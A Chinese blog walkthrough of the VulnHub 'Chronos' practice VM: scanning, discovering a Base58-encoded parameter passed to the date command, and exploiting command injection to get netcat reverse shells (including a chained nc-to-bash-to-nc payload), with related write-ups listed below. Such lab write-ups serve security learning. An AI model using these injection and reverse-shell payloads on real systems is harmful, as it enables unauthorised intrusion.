VulnHub靶场-Chronos

最新推荐文章于 2024-06-15 13:56:56 发布
最新推荐文章于 2024-06-15 13:56:56 发布
阅读量894 收藏
点赞数
分类专栏: 靶场 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/131155755
版权

目录

0x01 声明:

0x02 简介:

0x03 环境准备:

0x04 信息收集:

1、主机发现

2、NMAP扫描

3、访问业务

4、目录探测

5、查看网页代码

0x05 渗透测试过程:

1、Burp Suite抓包

2、构造payload

测试是否可以外联。

构造反弹shell payload

0x06 提权

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。

0x03 环境准备:

Chronos环境地址:

https://www.vulnhub.com/entry/chronos-1,735/

(提醒!我在这里用vm打开一直有问题,尝试网上各种方法后放弃了用VirtualBox)

0x04 信息收集:

1、主机发现

使用netdiscover工具来进行主机发现

netdiscover -r 192.168.56.0/16

2、NMAP扫描

对靶机进行操作系统、开放端口、运行的服务进行探测

nmap -sT -O -sV -p- 192.168.56.101

存在22对应SSH服务 80 8000对应http服务80端口对应 Apache服务,8000端口Node.js的Express框架搭建的http服务。

3、访问业务

访问80和8000端口对应业务

4、目录探测

对80端口进行目录探测,看看是否有可用路径。(并无可用路径)

5、查看网页代码

(发现有个奇怪的代码)

http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

(请求chronos.local的8000端口服务,之前我们在信息收集的时候正好有一个8000端口无法访问。)

修改host值

Linux:vim /etc/hosts

Windows:C:\Windows\System32\drivers\etc\hosts

(这个地方就比较奇怪了。后面我换了其他浏览器发现只有火狐行,应该是在UA处做了限制。)

0x05 渗透测试过程:

1、Burp Suite抓包

发现在format后有串类似Base64的字符使用“厨师“进行解密

哈哈发现并不是Base 64而是 Base58

用Kali执行:

Date‘+Today is %A, %B %d, %Y %H:%M:%S.'

2、构造payload

由上面分析可以发现,写入系统的数据应该是format后Base58传入后端。

构造恶意命令:

可以看到服务器回显成功。

测试是否可以外联。

利用telnet测试

可以看到靶机是可以外联成功的。

构造反弹shell payload

正常构造payload发现反弹失败。

&& nc 192.168.56.101 9999 -e /bin/bash

Base58

6eK5JFNT7CahVhdM6iDKHY4Q4b6xZA3b9SYoVitYyFvcX7T9pvQf

反弹失败,那么nc的版本可能过老,没有-e参数,下面我们用NC串联试试反弹

&& nc 192.168.56.102 8888 | /bin/bash | nc 192.168.56.102 9999

Base58

3Gho48Ayo8ZTkKBJiuZV9GykBLVZ7MCmLfYpf4xX8EYj5JPGL2eQFsFN2w6Aw4qR1mM3KNKmH17vabcdehnqv

反弹成功。

0x06 提权

后面有空在继续学习补充上来吧。

Kang_Sec
关注
专栏目录
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 586
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
vulnhub靶场-Chronos
qq_42947816的博客
05-10 923
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
VulnHub-Chronos: 1
weixin_44249502的博客
08-25 354
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
vulnhub chronos
weixin_46107179的博客
04-06 4424
靶机下载地址 主机发现 二层扫描:arp-scan -l 或则 netdiscover -r 10.0.2.0/24,扫描得到主机的IP地址10.0.2.6 信息搜集 通过nmap信息搜集主机信息,得到主机开放了22,80,8000端口,并且用的web服务是通过node.js的Express framework写的,以及中间件是Apache等信息 然后用浏览器打开这两个端口,发现这两个页面其实是一个页面,知识80端口那个页面是8000端口加了css样式的,然后尝试扫描隐藏目录,并没有什么发现;但是在查
nim-chronos:Chronos-一个高效的异步编程库
02-03
**nim-chronos:Chronos——高效的异步编程库** Nim语言的生态系统中,`nim-chronos`是一个至关重要的库,它为开发者提供了强大的异步编程工具,旨在提高性能和可读性。异步编程是现代软件开发中的一个核心概念,...
eZ430-Chronos_Software.rar_ez430_chronos
09-24
《eZ430-Chronos智能手表软件详解》 eZ430-Chronos是一款集成微控制器的智能手表,由Texas Instruments(TI)公司推出,它将强大的嵌入式处理能力与时尚的可穿戴设计相结合。这款手表不仅具备传统时间显示功能,还...
PyPI 官网下载 | AlekSIS-App-Chronos-2.2.tar.gz
01-31
标题中的"PyPI 官网下载 | AlekSIS-App-Chronos-2.2.tar.gz"表明这是一个从Python Package Index(PyPI)官方源下载的软件包,名为"AlekSIS-App-Chronos-2.2",且其格式为tar.gz。PyPI是Python社区中最主要的第三方...
TI eZ430-Chronos Clock and Data Logger-开源
07-25
TI eZ430-Chronos是一款由德州仪器(Texas Instruments, TI)推出的开源智能手表,它集成了钟表功能和数据记录能力。这款设备专为开发者和爱好者设计,允许他们进行各种嵌入式系统实验和应用开发。开源的特性意味着...
docker-chronos:Debian Wheezy 上 Chronos 的 Dockerfile
06-01
docker-chronos 用于在 Debian Wheezy 上运行 Chronos 的 Dockerfile。 指示 使用 Docker: $ docker run tobiassvn/chronos --master zk://localhost:2181/mesos --zk_hosts localhost:2181 通过马拉松: { " ...
Vulnhub靶机--Chronos
Tauil的博客
08-05 651
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
Vulnhub靶机随笔-Chronos
weixin_59005129的博客
03-07 929
我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell 命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'
Vulnhub系列--CHRONOS: 1
ch3cke的博客
03-31 4363
本次渗透测试我将使用cs来辅助进行渗透: 打点 主机存活发现: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.56.1/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 09:35 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or spec.
vulhub靶场chronos靶场渗透全过程 :
weixin_62319197的博客
03-14 464
本文记录了对vulhub一个靶场的打靶拿到root权限全过程 内容比较基础。
Vulnhub:CHRONOS: 1
最新发布
weixin_69670995的博客
06-15 588
在 /opt/chronos-v2/backend 下发现 express-fileupload,百度一下它的漏洞,找的了攻击代码。抓包发现有三个请求,最后一个显示了时间,将get传参进行解密,尝试了base64,结果失败,后来发现是base58解密。将下载的虚拟机导入Oracle VM VirtualBox中,网络设置仅主机模式,网卡使用和kali相同的网卡。发现是显示当前时间的命令,猜测是命令执行,尝试一下命令要用base58编码一下。发现22,80,8080端口,使用浏览器访问80端口。
VulnHub日记(十八):Chronos: 1
Dawn_Xi的博客
02-12 3182
参考链接 Vulnhub: 参考博客 GTFOBins 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.126 fping -aqg 192.168.56.0/24 nmap 扫描主机 nmap -A -T4 -v 192.168.56.126 扫描目录无果,开放22,80和8000,访问 内容相似,bp抓包,发现参数format 将内容进行识别,可能是base64或base58 两个都测试后,是base58 bp去除参数,查看结果比较,猜测是date命
VulnhubChronos:1 靶机实验
weixin_64112307的博客
06-30 1098
EJS-RCE
靶机三:CHRONOS_ 1
travelnight的博客
05-05 387
靶机三:CHRONOS: 1
【打靶】vulhub打靶复现系列3---Chronos
weixin_52351575的博客
10-26 271
结合之前的方法(arp探测、ping检测),因为我们的靶机和攻击机都在第二层,所以打靶时候我们更依赖arp协议tips:我在运行期间发现,netdiscover窗口没关闭的前提下是可以一直检测的,也就是说在探活期间有新主机加入可以被立即识别到。​ nmap -p- -sV -T4 192.168.56.104 ssh可以爆破(hydra)http直接去访问(先看下80端口下的页面)发现页面没有什么东西,两种思路:发现其源码中有调用一个脚本发现进行了编码通过cyberchef美化一下,地址​​CyberCh
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值